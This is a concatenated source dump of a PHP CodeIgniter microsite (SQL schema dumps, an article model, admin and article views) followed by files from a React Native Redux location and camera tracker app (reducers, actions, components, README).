MODIFY `id_order` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_payment`
--
ALTER TABLE `vc_payment`
MODIFY `id_payment` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_product`
--
ALTER TABLE `vc_product`
MODIFY `id_product` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_setting`
--
ALTER TABLE `vc_setting`
MODIFY `id_setting` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_tip`
--
ALTER TABLE `vc_tip`
MODIFY `id_tip` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_user`
--
ALTER TABLE `vc_user`
MODIFY `id_user` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `vc_workshop`
--
ALTER TABLE `vc_workshop`
MODIFY `id_workshop` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/application/views/admin/common/header.php
<!-- Admin layout <head> partial: page metadata plus all stylesheet includes
     (Bootstrap, Font Awesome, AdminLTE theme and plugins). Expects $title_web
     to be set by the controller. -->
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title><?php echo $title_web?></title>
<!-- Tell the browser to be responsive to screen width -->
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.6 -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/bootstrap/css/bootstrap.min.css')?>">
<!-- Font Awesome -->
<link href="<?php echo base_url('asset/asset_default/font-awesome/css/font-awesome.min.css')?>" rel="stylesheet" type="text/css">
<!-- Theme style -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/dist/css/AdminLTE.min.css')?>">
<!-- AdminLTE Skins. Choose a skin from the css/skins
folder instead of downloading all of them to reduce the load. -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/dist/css/skins/_all-skins.min.css')?>">
<!-- iCheck -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/iCheck/flat/blue.css')?>">
<!-- Morris chart -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/morris/morris.css')?>">
<!-- jvectormap -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/jvectormap/jquery-jvectormap-1.2.2.css')?>">
<!-- Date Picker -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/datepicker/datepicker3.css')?>">
<!-- Daterange picker -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/daterangepicker/daterangepicker.css')?>">
<!-- bootstrap wysihtml5 - text editor -->
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/admin_default.css')?>">
<link rel="stylesheet" href="<?php echo base_url('asset/asset_lte/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.min.css')?>">
<!-- jQuery 2.2.0 -->
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
// class Page extends CI_Controller {
//
// // public function __construct(){
// // parent::__construct();
// // }
//
// // public function add_user(){
// // $data['title_web']= 'Add User';
// // $data['path_content']='admin/module/add_user';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_user(){
// // $data['title_web']= 'Manage User';
// // $data['path_content']='admin/module/manage_user';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function add_news(){
// // $data['title_web']= 'Add News';
// // $data['path_content']='admin/module/add_news';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_news(){
// // $data['title_web']= 'Manage News';
// // $data['path_content']='admin/module/manage_news';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function add_category(){
// // $data['title_web']= 'Add Category';
// // $data['path_content']='admin/module/add_category';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
// // public function manage_category(){
// // $data['title_web']= 'Manage Category';
// // $data['path_content']='admin/module/manage_category';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
//
//
// }
?>
<file_sep>/application/views/default/module/read_article.php
<div class="container">
<div class="bpt-about text-center" style="margin-bottom:20px;margin-top:175px">
<div class="container">
<div class="row bpt-title text-left">
<h2>Article <!-- / <?php echo $result['name_category']?> --></h2>
</div>
</div>
<div class="blog-preview">
<div style="margin-bottom:15px">
<div class="blog-title text-left">
<?php echo $result['title_article']?>
</div>
<div class="row bpt-stat">
<!-- <div class="col-md-2">
<i class="fa fa-pencil" aria-hidden="true"></i> Created by: <?php echo $result['username'] ?>
</div> -->
<div class="col-md-2 col-xs-6 text-left">
<i class="fa fa-clock-o" aria-hidden="true"></i> <?php echo date('d M Y',strtotime($result['date_article']))?>
</div>
<!--
<div class="col-md-2">
<i class="fa fa-eye" aria-hidden="true"></i> Viewed <?php echo $result['view'] ?> x
</div> -->
</div>
</div>
<div class="row">
<div class="col-md-3">
<img class="img-responsive" src="<?php echo base_url($result['image_article'])?>">
<small><em><?php echo $result['caption']; ?></em></small>
</div>
<div class="col-md-9 text-left">
<?php
echo $result['content_article']
?>
</div>
<div class="pull-right">
<br/>
<span class='st_facebook_large' displayText='Facebook'></span>
<span class='st_twitter_large' displayText='Tweet'></span>
<span class='st_linkedin_large' displayText='LinkedIn'></span>
<span class='st_pinterest_large' displayText='Pinterest'></span>
<span class='st_email_large' displayText='Email'></span>
</div>
</div>
</div><!-- /.blog-preview-->
</div>
</div>
<section id="contact">
<div id="bpt-top-footer">
<div class="container">
<?php $this->load->view('default/common/footer_page')?>
</div>
</div><file_sep>/database/db_bpt_baru bgt.sql
-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Dec 17, 2016 at 07:16 AM
-- Server version: 10.1.19-MariaDB
-- PHP Version: 7.0.13
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `db_bpt`
--
-- --------------------------------------------------------
--
-- Table structure for table `bp_article`
--
-- Articles published through the admin panel (see Marticle.php model).
CREATE TABLE `bp_article` (
`id_article` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`title_article` varchar(100) NOT NULL,
`date_article` datetime NOT NULL,
-- FIX: the article body was varchar(100), silently truncating anything longer;
-- widened to longtext to match description_category in bp_category and the
-- full-content rendering in read_article.php.
`content_article` longtext NOT NULL,
`image_article` varchar(100) NOT NULL,
`caption` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_article`
--
INSERT INTO `bp_article` (`id_article`, `id_category`, `id_user`, `title_article`, `date_article`, `content_article`, `image_article`, `caption`) VALUES
(1, 2, 1, 'PILGUB', '2016-12-03 04:14:54', 'PLIGUB MAKIN SERU BANGET', 'asset/images/pligub.jpg', ''),
(2, 1, 1, 'test', '2016-12-07 05:46:30', 'asd', 'asset/images/cherry-jpg-inspirations-website.jpg', 'event ');
-- --------------------------------------------------------
--
-- Table structure for table `bp_bod`
--
CREATE TABLE `bp_bod` (
`id_bod` int(11) NOT NULL,
`title_bod` varchar(100) NOT NULL,
`name_bod` varchar(100) NOT NULL,
`sort_order` int(11) NOT NULL,
`content_bod` varchar(100) NOT NULL,
`image_bod` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_category`
--
CREATE TABLE `bp_category` (
`id_category` int(11) NOT NULL,
`nama_category` varchar(100) NOT NULL,
`description_category` longtext NOT NULL,
`image_category` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_category`
--
INSERT INTO `bp_category` (`id_category`, `nama_category`, `description_category`, `image_category`) VALUES
(1, 'event', 'motorola', 'asset/images/moto.jpg'),
(2, 'News', 'PILGUB', 'asset/images/pligub.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `bp_page`
--
CREATE TABLE `bp_page` (
`id_page` int(11) NOT NULL,
`title_page` varchar(200) NOT NULL,
`content_page` longtext NOT NULL,
`image_page` varchar(200) NOT NULL,
`date_page` datetime NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_setting`
--
CREATE TABLE `bp_setting` (
`id_setting` int(11) NOT NULL,
`title_website` varchar(100) NOT NULL,
`about` varchar(100) NOT NULL,
`address` varchar(100) NOT NULL,
`telephone` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`facebook` varchar(100) NOT NULL,
`twitter` varchar(100) NOT NULL,
`linkedin` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_testimonial`
--
CREATE TABLE `bp_testimonial` (
`id_testimonial` int(11) NOT NULL,
`testimonial` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_user`
--
-- Application users for the microsite admin panel.
-- NOTE(review): `password` is char(32), which suggests an unsalted MD5 hash —
-- TODO confirm the hashing in the auth controller and consider a stronger scheme.
CREATE TABLE `bp_user` (
`id_user` int(11) NOT NULL,
`username` varchar(100) NOT NULL,
`password` char(32) NOT NULL,
`fullname` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`permission` tinyint(2) NOT NULL COMMENT '1.admin , 2.user',
`date_regis` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_user`
--
INSERT INTO `bp_user` (`id_user`, `username`, `password`, `fullname`, `email`, `permission`, `date_regis`) VALUES
(1, 'admin', '<PASSWORD>', 'admin', '<EMAIL>', 1, '0000-00-00 00:00:00'),
(2, '<NAME>', '<PASSWORD>', 'zu<NAME> <PASSWORD>i', '<EMAIL>', 2, '2016-12-01 11:59:24');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `bp_article`
--
ALTER TABLE `bp_article`
ADD PRIMARY KEY (`id_article`);
--
-- Indexes for table `bp_bod`
--
ALTER TABLE `bp_bod`
ADD PRIMARY KEY (`id_bod`);
--
-- Indexes for table `bp_category`
--
ALTER TABLE `bp_category`
ADD PRIMARY KEY (`id_category`);
--
-- Indexes for table `bp_page`
--
ALTER TABLE `bp_page`
ADD PRIMARY KEY (`id_page`);
--
-- Indexes for table `bp_setting`
--
ALTER TABLE `bp_setting`
ADD PRIMARY KEY (`id_setting`);
--
-- Indexes for table `bp_testimonial`
--
ALTER TABLE `bp_testimonial`
ADD PRIMARY KEY (`id_testimonial`);
--
-- Indexes for table `bp_user`
--
ALTER TABLE `bp_user`
ADD PRIMARY KEY (`id_user`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `bp_article`
--
ALTER TABLE `bp_article`
MODIFY `id_article` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `bp_bod`
--
ALTER TABLE `bp_bod`
MODIFY `id_bod` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_category`
--
ALTER TABLE `bp_category`
MODIFY `id_category` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `bp_page`
--
ALTER TABLE `bp_page`
MODIFY `id_page` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_setting`
--
ALTER TABLE `bp_setting`
MODIFY `id_setting` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_testimonial`
--
ALTER TABLE `bp_testimonial`
MODIFY `id_testimonial` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_user`
--
ALTER TABLE `bp_user`
MODIFY `id_user` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/application/models/Marticle.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
class Marticle extends CI_Model {
// constrcutor
function __construct(){
parent::__construct();
}
function fetchArticle($limit,$start,$pagenumber) {
if($pagenumber!="")
$this->db->limit($limit,($pagenumber*$limit)-$limit);
else
$this->db->limit($limit,$start);
if($this->session->userdata('permission')== 2)
$this->db->where('article.id_user',$this->session->userdata('idAdmin'));
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('date_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
function countAllarticle() {
return $this->db->count_all("article");
}
function saveArticle($data,$upload_data){
$array = array(
'id_user' => $this->session->userdata('idAdmin'),
'id_category' => $data['id_category'],
'title_article' => $data['title_article'],
'content_article' => $data['content_article'],
'caption' => $data['caption'],
'date_article' => date('Y-m-d H:i:s'),
'image_article' => 'asset/images/'.$upload_data['orig_name']
);
$this->db->insert('article',$array);
return 1;
}
function editArticle($data,$upload_data,$id){
$array = array(
'id_category' => $data['id_category'],
'title_article' => $data['title_article'],
'caption' => $data['caption'],
'content_article' => $data['content_article'],
);
if($upload_data!=false){
$array['image_article'] = 'asset/images/'.$upload_data['orig_name'];
}
$this->db->where('id_article',$id);
$this->db->update('article',$array);
return 1;
}
function fetchArticleSearch($data) {
$this->db->like($data['by'],$data['search']);
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('title_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
function getArticle($id){
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->where('id_article',$id);
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->row_array();
}
else return FALSE;
}
function fetchAllCategory(){
$query = $this->db->get('category');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
/**
 * Fetch a page of articles for one category, newest first.
 *
 * @param int        $limit       rows per page
 * @param int        $start       raw offset, used only when $pagenumber is empty
 * @param int|string $pagenumber  1-based page number; when given, the offset is
 *                                computed as ($pagenumber * $limit) - $limit
 * @param int        $id_category category to filter on
 * @return array|bool result rows, or FALSE when the page is empty
 */
function fetchArticleCategory($limit,$start,$pagenumber,$id_category) {
// Page number takes precedence over the raw offset.
if($pagenumber!="")
$this->db->limit($limit,($pagenumber*$limit)-$limit);
else
$this->db->limit($limit,$start);
$this->db->where('article.id_category',$id_category);
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('date_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
}
<file_sep>/application/views/admin/user/edit_user.php
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<section class="content-header">
<h1>
Edit User
</h1>
<ol class="breadcrumb">
<li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
<li class="active">Edit User</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class="box body">
<div class="container">
<a class="btn btn-sm bpt-btn-primary btn-rd" style="margin-top:10px" href="<?php echo base_url($this->uri->segment(1).'/user/manage-user')?>" role="button">
<i class="fa fa-arrow-left fa-fw" aria-hidden="true"></i>Back to Dashboard
</a>
<form class="" method="post">
<?php echo validation_errors()?>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Fullname</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12" name="fullname" value="<?php echo $result['fullname']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Username</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12" name="username" value="<?php echo $result['username']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Password</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="password" class="form-control col-md-7 col-xs-12" name="password">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Confirm Password</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="password" class="form-control col-md-7 col-xs-12" name="confirm_pass">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Email</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12" name="email" value="<?php echo $result['email']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Permission</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<?php
$options = array(
'1' => '1-Admin',
'2' => '2-User'
);
echo form_dropdown('permission',$options,$result['permission'],'class="form-control"');
?>
<button class="btn btn-sm bpt-btn-primary btn-rd" style="margin-top:10px" >
Save
</button>
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
</form>
</div>
</div>
</section>
<!-- /.content -->
</div>
<!-- /.content-wrapper -->
<!-- Main Footer -->
<footer class="main-footer">
<!-- To the right -->
<div class="pull-right hidden-xs">
Anything you want
</div>
<!-- Default to the left -->
<strong>Copyright © 2016 <a href="#">Company</a>.</strong> All rights reserved.
</footer>
<!-- Control Sidebar -->
<aside class="control-sidebar control-sidebar-dark">
<!-- Create the tabs -->
<ul class="nav nav-tabs nav-justified control-sidebar-tabs">
<li class="active"><a href="#control-sidebar-home-tab" data-toggle="tab"><i class="fa fa-home"></i></a></li>
<li><a href="#control-sidebar-settings-tab" data-toggle="tab"><i class="fa fa-gears"></i></a></li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<!-- Home tab content -->
<div class="tab-pane active" id="control-sidebar-home-tab">
<h3 class="control-sidebar-heading">Recent Activity</h3>
<ul class="control-sidebar-menu">
<li>
<a href="javascript::;">
<i class="menu-icon fa fa-birthday-cake bg-red"></i>
<div class="menu-info">
<h4 class="control-sidebar-subheading">Langdon's Birthday</h4>
<p>Will be 23 on April 24th</p>
</div>
</a>
</li>
</ul>
<!-- /.control-sidebar-menu -->
<h3 class="control-sidebar-heading">Tasks Progress</h3>
<ul class="control-sidebar-menu">
<li>
<a href="javascript::;">
<h4 class="control-sidebar-subheading">
Custom Template Design
<span class="pull-right-container">
<span class="label label-danger pull-right">70%</span>
</span>
</h4>
<div class="progress progress-xxs">
<div class="progress-bar progress-bar-danger" style="width: 70%"></div>
</div>
</a>
</li>
</ul>
<!-- /.control-sidebar-menu -->
</div>
<!-- /.tab-pane -->
<!-- Stats tab content -->
<div class="tab-pane" id="control-sidebar-stats-tab">Stats Tab Content</div>
<!-- /.tab-pane -->
<!-- Settings tab content -->
<div class="tab-pane" id="control-sidebar-settings-tab">
<form method="post">
<h3 class="control-sidebar-heading">General Settings</h3>
<div class="form-group">
<label class="control-sidebar-subheading">
Report panel usage
<input type="checkbox" class="pull-right" checked>
</label>
<p>
Some information about this general settings option
</p>
</div>
<!-- /.form-group -->
</form>
</div>
<!-- /.tab-pane -->
</div>
</aside>
<!-- /.control-sidebar -->
<!-- Add the sidebar's background. This div must be placed
immediately after the control sidebar -->
<div class="control-sidebar-bg"></div>
</div>
| 863016997c2610974154f899e38cf379aba99c6b | [
"SQL",
"PHP"
] | 7 | SQL | Irwin99/microsite-bpt | bb283d998866c968a3499ed4cf95f80f1a748204 | 329a3517beccbd033b196524b740b996a5a2d328 |
refs/heads/master | <repo_name>Wolven531/react-native-tracker<file_sep>/reducers/location.js
import * as ActionTypes from '../constants/action-types'
// Action types whose handlers require a non-empty payload.
const PAYLOAD_REQUIRED = [
  ActionTypes.SET_LOCATION_UPDATING,
  ActionTypes.SET_NEW_LOCATION
]

// Default slice state: no fix yet, no map region, not currently updating.
const initialState = {
  locationIsUpdating: false,
  locationResult: null,
  mapRegion: null
}

/**
 * Reducer for the location slice: tracks whether a fix is being fetched,
 * the last location result, and the map region derived from it.
 */
const locationReducer = (state = initialState, action) => {
  const { payload, type } = action
  console.info(`[locationReducer] Processing action of type="${type}"`)
  if (PAYLOAD_REQUIRED.includes(type) && !payload) {
    console.warn(`[locationReducer] Payload was missing for type=${type}`)
    return state
  }
  if (type === ActionTypes.SET_LOCATION_UPDATING) {
    return {
      ...state,
      locationIsUpdating: payload.isUpdating
    }
  }
  if (type === ActionTypes.SET_NEW_LOCATION) {
    // A fresh fix also recentres the map on the new coordinates.
    const { coords } = payload.newLocation
    return {
      ...state,
      locationIsUpdating: false,
      locationResult: payload.newLocation,
      mapRegion: {
        latitude: coords.latitude,
        latitudeDelta: 0.0922,
        longitude: coords.longitude,
        longitudeDelta: 0.0421
      }
    }
  }
  if (type === ActionTypes.SET_MAP_REGION) {
    return {
      ...state,
      mapRegion: payload.newRegion
    }
  }
  return state
}

export { locationReducer }
<file_sep>/store/index.js
import { combineReducers, createStore } from 'redux'
import { mainReducer } from '../reducers'
// TODO: when multiple reducers come into play
// const allReducers = combineReducers({
// ...mainReducer
// })
// NOTE(review): combineReducers is imported but only used in the commented-out
// TODO above.
// Single Redux store for the whole app, built from the root reducer.
const store = createStore(mainReducer)
export { store }
<file_sep>/components/TitleBar.js
import React from 'react'
// import { ImageBackground } from 'react-native'
import { Text, View } from 'react-native'
import PropTypes from 'prop-types'
// import { styles } from '../styles'
const localStyles = {
container: {
alignSelf: 'stretch',
backgroundColor: 'rgba(255, 0, 0, 1)',
flex: 1,
flexDirection: 'column',
justifyContent: 'center'
}
}
class TitleBar extends React.Component {
render() {
return (
<View style={localStyles.container}>
<Text>{this.props.children}</Text>
</View>
)
}
}
TitleBar.propTypes = {
allowFontScaling: PropTypes.bool,
children: PropTypes.string.isRequired,
style: PropTypes.object
}
export { TitleBar }
<file_sep>/constants/strings.js
// Data-URI prefix prepended to base64 image payloads before display.
// NOTE(review): declares image/gif while the camera capture is presumably
// JPEG — confirm consumers tolerate the mismatch.
export const BASE_64_PREFIX = 'data:image/gif;base64,'
<file_sep>/README.md
# react-native-tracker
This repository makes use of several modern frontend technologies and can be used as a testing / starting point for those looking to experiment with those technologies.
## Technologies / Frameworks
* React
* React Native
* Redux
* Expo
* Babel
* NPM
* TypeScript
## Requirements
* Latest NPM: `npm i -g npm@latest`
* Expo-CLI: `npm i -g expo-cli`
## Running
1. Navigate to the project directory on your drive
1. Run `npm run android-start` to spin up the development server (e.g. for android)
1. Download the Expo app for your platform (Android or iOS)
1. Sign into Expo app
1. Navigate to project in the Expo app (presuming you have been provided access)
<file_sep>/components/PermissionObjectDisplay.js
import React from 'react'
import { Text, View } from 'react-native'
import { styles } from '../styles'
const localStyles = {
container: {
alignItems: 'center',
alignSelf: 'stretch',
backgroundColor: '#333',
flex: 1,
flexDirection: 'row',
justifyContent: 'space-between',
// maxHeight: 40,
paddingHorizontal: 10
}
}
/**
 * Upper-case the first character of a string; any falsy input yields ''.
 */
const capitalize = (str) => (str ? str[0].toUpperCase() + str.slice(1) : '')
/**
 * Pick the text style for a permission row: green when granted, red when
 * denied, white otherwise (including a missing permission object).
 */
const getPermissionTextStyle = (permissionObj) => {
  if (!permissionObj) {
    return styles.textWhite
  }
  switch (permissionObj.status) {
    case 'granted':
      return styles.highlightGreen
    case 'denied':
      return styles.textRed
    default:
      return styles.textWhite
  }
}
const PermissionObjectDisplay = (props) => {
const status = (props.permission && capitalize(props.permission.status)) || 'Unknown'
return (
<View style={localStyles.container}>
{/*
<Text>{JSON.stringify(props.permission, null, 4)}</Text>
*/}
<Text style={styles.textWhite}>{capitalize(props.title)}: </Text>
<Text style={getPermissionTextStyle(props.permission)}>{capitalize(status)}</Text>
</View>
)
}
export { PermissionObjectDisplay }
<file_sep>/reducers/permission.js
import * as ActionTypes from '../constants/action-types'
// Action types whose handlers require a non-empty payload.
const payloadRequiredActions = [
ActionTypes.SET_PERMISSION_CAMERA,
ActionTypes.SET_PERMISSION_LOCATION
]
// Default slice state: neither permission has been queried yet.
const initialState = {
permissionCamera: null,
permissionLocation: null
}
/**
 * Reducer for the permission slice: caches the camera and location
 * permission objects returned by Expo's Permissions API.
 */
const permissionReducer = (state = initialState, action) => {
const { payload, type } = action
console.info(`[permissionReducer] Processing action of type="${type}"`)
// Guard: ignore payload-carrying actions that arrived without one.
if (!payload && payloadRequiredActions.indexOf(type) > -1) {
console.warn(`[permissionReducer] Payload was missing for type=${type}`)
return state
}
switch (type) {
case ActionTypes.SET_PERMISSION_CAMERA:
return {
...state,
permissionCamera: payload.permission
}
case ActionTypes.SET_PERMISSION_LOCATION:
return {
...state,
permissionLocation: payload.permission
}
default:
return state
}
}
export { permissionReducer }
<file_sep>/actions/index.js
import * as ActionTypes from '../constants/action-types'
// Internal helper: build a plain { type, payload } action object.
const makeAction = (type, payload) => ({ type, payload })

/** Choose which camera (front/back constant) is active. */
const setActiveCamera = (cameraType) =>
  makeAction(ActionTypes.SET_ACTIVE_CAMERA, { camera: cameraType })

/** Store the camera zoom factor. */
const setCameraZoom = (newZoom) =>
  makeAction(ActionTypes.SET_CAMERA_ZOOM, { zoom: newZoom })

/** Cache the photos fetched from the device camera roll. */
const setCameraRollPhotos = (photos) =>
  makeAction(ActionTypes.SET_CAMERAROLL_PHOTOS, { photos })

/** Store the latest face-detection payload. */
const setFacesDetected = (faceData) =>
  makeAction(ActionTypes.SET_FACES_DETECTED, { faceData })

/** Store the currently displayed map region. */
const setMapRegion = (newRegion) =>
  makeAction(ActionTypes.SET_MAP_REGION, { newRegion })

/** Store a freshly acquired device location. */
const setNewLocation = (newLocation) =>
  makeAction(ActionTypes.SET_NEW_LOCATION, { newLocation })

/** Cache the camera permission object. */
const setPermissionCamera = (newCameraPermission) =>
  makeAction(ActionTypes.SET_PERMISSION_CAMERA, { permission: newCameraPermission })

/** Cache the location permission object. */
const setPermissionLocation = (newLocationPermission) =>
  makeAction(ActionTypes.SET_PERMISSION_LOCATION, { permission: newLocationPermission })

/** Store the URI of a captured photo. */
const setPhoto = (newPhoto) =>
  makeAction(ActionTypes.SET_PHOTO, { photoUri: newPhoto.uri })
/**
 * Flag whether a location fix is currently being fetched.
 *
 * BUG FIX: this creator previously dispatched SET_NEW_LOCATION, whose reducer
 * branch reads payload.newLocation.coords and would throw on this
 * { isUpdating } payload. The payload belongs to SET_LOCATION_UPDATING,
 * whose branch reads payload.isUpdating.
 */
const setUpdatingLocation = (isUpdating) => {
  return {
    type: ActionTypes.SET_LOCATION_UPDATING,
    payload: {
      isUpdating
    }
  }
}
export {
setActiveCamera,
setCameraZoom,
setCameraRollPhotos,
setFacesDetected,
setMapRegion,
setNewLocation,
setPermissionCamera,
setPermissionLocation,
setPhoto,
setUpdatingLocation
}
<file_sep>/containers/ZoomControl.js
import React from 'react'
import { Text, View } from 'react-native'
import { Slider } from 'react-native-elements'
import { connect } from 'react-redux'
import PropTypes from 'prop-types'
import { setCameraZoom } from '../actions'
import { styles } from '../styles'
const localStyles = {
container: {
alignItems: 'center',
backgroundColor: 'rgba(0,0,0,.5)',
borderColor: '#ccc',
borderWidth: 1,
flexDirection: 'row',
height: 50,
justifyContent: 'space-between',
marginBottom: 10,
marginHorizontal: 10,
paddingLeft: 10
},
slider: {
flex: 1,
marginLeft: 10,
marginRight: 30
}
}
const ZoomControl = ({ cameraZoom = 0, onZoomUpdate }) => {
return (
<View style={localStyles.container}>
<Text style={[ styles.textWhite, { width: 110 } ]}>
Zoom: {((cameraZoom + 1.0) * 100.0).toFixed(2)}%
</Text>
<Slider
animateTransitions={true}
animationType={'spring'}
maximumValue={110}
minimumValue={100}
onValueChange={onZoomUpdate}
step={0.05}
value={(cameraZoom + 1.0) * 100.0}
style={localStyles.slider}
/>
</View>
)
}
ZoomControl.propTypes = {
cameraZoom: PropTypes.number,
onZoomUpdate: PropTypes.func.isRequired
}
const mapStateToProps = state => {
const { cameraZoom } = state.camera
return {
cameraZoom
}
}
const mapDispatchToProps = dispatch => {
const onZoomUpdate = newValue => {
const actualZoom = (newValue - 100.0) / 100.0
dispatch(setCameraZoom(actualZoom))
}
return {
onZoomUpdate
}
}
ZoomControl = connect(mapStateToProps, mapDispatchToProps)(ZoomControl)
export { ZoomControl }
<file_sep>/containers/CameraRenderer.js
import React from 'react'
import { connect } from 'react-redux'
